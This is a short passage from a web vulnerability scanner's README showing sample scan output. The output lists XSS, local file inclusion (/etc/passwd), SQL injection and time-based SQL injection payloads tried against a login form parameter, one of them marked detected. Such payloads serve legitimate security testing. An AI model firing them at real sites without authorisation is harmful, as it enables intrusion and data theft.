swisskyrepo/DamnWebScanner/README.md

 ---[ POST - New parameter rememberme for url: http://[REDACTED]/login.php ]---
 		[94mXSS Failed [0m for  rememberme  with the payload : jaVasCript:alert(1)//" name=alert(1) ]'"><!--
 		[94mLFI Failed [0m for  rememberme  with the payload : /etc/passwd
-		[94mSQLi Failed [0m for  rememberme  with the payload : '
+		[94mSQLi Detected [0m for  rememberme  with the payload : '
 		[94mTime Based SQLi ( MySQL ) Failed [0m for  rememberme  with the payload : SLEEP(4) /*' || SLEEP(4) || '" || SLEEP(4) || "*/
 		[94mTime Based SQLi ( SQLite ) Failed [0m for  rememberme  with the payload : substr(upper(hex(randomblob(55555555))),0,1) /[*' or substr(upper(hex(randomblob(55555555))),0,1) or '" or substr(upper(hex(randomblob(55555555)])),0,1) or "*/
 		[94mTime Based SQLi ( PostgreSQL ) Failed [0m for  rememberme  with the payload : (SELECT 55555555 FROM PG_SLEEP(4)) /*' || (SELECT 55555555 FROM PG_SLEEP(4)) || '" || (SELECT 55555555 FROM PG_SLEEP(4)) || "*/